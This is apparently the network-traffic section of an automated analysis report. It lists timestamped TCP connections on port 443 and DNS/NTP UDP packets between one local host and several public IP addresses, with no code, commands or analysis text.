                                                                                                Jul 30, 2024 00:46:21.378009081 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.378171921 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.379188061 CEST49718443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.379205942 CEST4434971888.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.380840063 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.380873919 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.380983114 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.381262064 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:21.381277084 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.514955997 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.515244007 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.515271902 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.516279936 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.516366959 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.518590927 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.518676996 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.519418955 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.519429922 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.564368010 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.660559893 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.660630941 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.661678076 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.662023067 CEST49724443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.662048101 CEST4434972435.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.662960052 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663005114 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.663132906 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663527966 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:21.663542032 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.893369913 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.895606995 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.895632029 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.896652937 CEST4434972318.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:21.896719933 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.897912979 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:21.898025990 CEST49723443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.005923033 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.005971909 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.006036043 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.050369978 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.050411940 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.106353998 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.113200903 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.113219023 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.113604069 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.119096041 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.119194031 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.119595051 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.164508104 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.275305033 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.275361061 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.275576115 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.278165102 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:22.278177977 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362031937 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362360001 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.362380028 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.362729073 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.363085032 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.363153934 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.363269091 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.404411077 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.404424906 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521498919 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521589041 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.521636009 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.524509907 CEST49727443192.168.2.735.190.80.1
                                                                                                Jul 30, 2024 00:46:22.524535894 CEST4434972735.190.80.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580459118 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580552101 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.580790043 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.596606970 CEST49725443192.168.2.788.212.201.198
                                                                                                Jul 30, 2024 00:46:22.596632004 CEST4434972588.212.201.198192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.617496014 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617539883 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.617625952 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617903948 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:22.617918015 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.641784906 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.641820908 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.641978979 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.642679930 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:22.642699003 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.780766010 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.782051086 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.782080889 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.783622026 CEST4434972818.239.18.53192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.783679962 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.784953117 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.785046101 CEST49728443192.168.2.718.239.18.53
                                                                                                Jul 30, 2024 00:46:22.825072050 CEST49698443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.826006889 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.826052904 CEST44349732104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.826292038 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.833170891 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:46:22.833201885 CEST44349732104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.841299057 CEST44349698104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.998465061 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:22.998555899 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.020932913 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.020953894 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.021908998 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.070324898 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.096664906 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.096975088 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.097002029 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098009109 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098083973 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098376989 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098434925 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.098524094 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.098531008 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.149323940 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.231400967 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231467962 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231517076 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231534004 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.231563091 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231583118 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.231641054 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232446909 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232465982 CEST44349730172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.232475042 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.232532024 CEST49730443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.257704020 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.257751942 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.258158922 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.258368015 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.258378029 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.423918962 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:23.423969984 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.424038887 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:23.424412966 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:23.424423933 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.595607042 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.595947981 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.595961094 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.597028971 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.597084999 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.597520113 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.597578049 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.597795963 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.597805023 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.642322063 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.735827923 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.736325026 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.736340046 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.737317085 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.737412930 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.738061905 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.738109112 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.738257885 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.738262892 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.784187078 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:23.785316944 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.828499079 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.841137886 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.841231108 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.841300011 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.868195057 CEST49731443192.168.2.788.212.201.204
                                                                                                Jul 30, 2024 00:46:23.868211985 CEST4434973188.212.201.204192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898668051 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898720980 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898770094 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898818016 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.898829937 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898844004 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.898869038 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.898895979 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.900583029 CEST49734443192.168.2.7172.67.132.113
                                                                                                Jul 30, 2024 00:46:23.900592089 CEST44349734172.67.132.113192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.950144053 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:23.950192928 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:23.950427055 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:23.953902006 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:23.953919888 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027040958 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027067900 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027076006 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027127981 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027143002 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.027163029 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027190924 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027194977 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.027213097 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.027241945 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.027406931 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027476072 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.027481079 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027491093 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.027534008 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:25.037436008 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.037827015 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:25.037841082 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.039673090 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.039736032 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:25.045763969 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:25.045965910 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.101309061 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:25.101316929 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.149323940 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:25.301635981 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:25.301680088 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.301742077 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:25.302679062 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:25.302701950 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.694921970 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.694996119 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:25.698424101 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:25.698440075 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.698681116 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:25.742301941 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:25.744447947 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:25.788505077 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.172239065 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.172302008 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.172369957 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.174139023 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.174685001 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.174706936 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.174719095 CEST49737443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.174725056 CEST44349737184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.175781012 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:26.175796986 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.176896095 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.176965952 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:26.178961992 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:26.179100037 CEST44349741128.116.21.3192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.179128885 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:26.179145098 CEST49741443192.168.2.7128.116.21.3
                                                                                                Jul 30, 2024 00:46:26.298437119 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:26.298487902 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.298500061 CEST49729443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:46:26.298511982 CEST4434972913.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.436332941 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.436374903 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:26.436455011 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.436769962 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:26.436784029 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.208312988 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.208389997 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.209769964 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.209781885 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.210032940 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.213387966 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.260509014 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.500205040 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.500292063 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.500834942 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.501674891 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.501708031 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:27.501859903 CEST49742443192.168.2.7184.28.90.27
                                                                                                Jul 30, 2024 00:46:27.501868963 CEST44349742184.28.90.27192.168.2.7
                                                                                                Jul 30, 2024 00:46:31.686671019 CEST49677443192.168.2.720.50.201.200
                                                                                                Jul 30, 2024 00:46:34.002515078 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:34.002670050 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:46:34.002861977 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:35.704637051 CEST49735443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:46:35.704663992 CEST44349735172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:02.995637894 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:02.995676994 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:02.995760918 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:02.996184111 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:02.996200085 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:03.747416973 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:03.747585058 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:03.752221107 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:03.752233982 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:03.752500057 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:03.760632992 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:03.804497004 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.039357901 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.039383888 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.039400101 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.039458036 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.039475918 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.039515018 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.044183969 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.044228077 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.044258118 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.044270039 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.044312000 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:04.046277046 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.046277046 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.046277046 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.046277046 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.265235901 CEST49743443192.168.2.713.85.23.86
                                                                                                Jul 30, 2024 00:47:04.265264034 CEST4434974313.85.23.86192.168.2.7
                                                                                                Jul 30, 2024 00:47:05.653903008 CEST44349732104.98.116.138192.168.2.7
                                                                                                Jul 30, 2024 00:47:05.654036999 CEST49732443192.168.2.7104.98.116.138
                                                                                                Jul 30, 2024 00:47:23.471398115 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:23.471468925 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:23.471568108 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:23.471795082 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:23.471817017 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:24.147990942 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:24.151308060 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:24.151325941 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:24.151664019 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:24.151913881 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:24.151973009 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:24.204125881 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:34.174761057 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:34.174827099 CEST44349745172.217.18.4192.168.2.7
                                                                                                Jul 30, 2024 00:47:34.174896955 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:35.732631922 CEST49745443192.168.2.7172.217.18.4
                                                                                                Jul 30, 2024 00:47:35.732692957 CEST44349745172.217.18.4192.168.2.7

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jul 30, 2024 00:46:06.825505018 CEST6424253192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:46:06.844732046 CEST53642421.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:07.899291039 CEST5974753192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:46:07.917977095 CEST53597471.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:14.460917950 CEST123123192.168.2.720.101.57.9
                                                                                                Jul 30, 2024 00:46:14.645025969 CEST12312320.101.57.9192.168.2.7
                                                                                                Jul 30, 2024 00:46:18.952945948 CEST53645151.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:19.029504061 CEST6321153192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:46:19.029632092 CEST6097053192.168.2.71.1.1.1
                                                                                                Jul 30, 2024 00:46:19.047980070 CEST53568071.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:19.049940109 CEST53632111.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:19.051006079 CEST53609701.1.1.1192.168.2.7
                                                                                                Jul 30, 2024 00:46:20.089903116 CEST53549821.1.1.1192.168.2.7
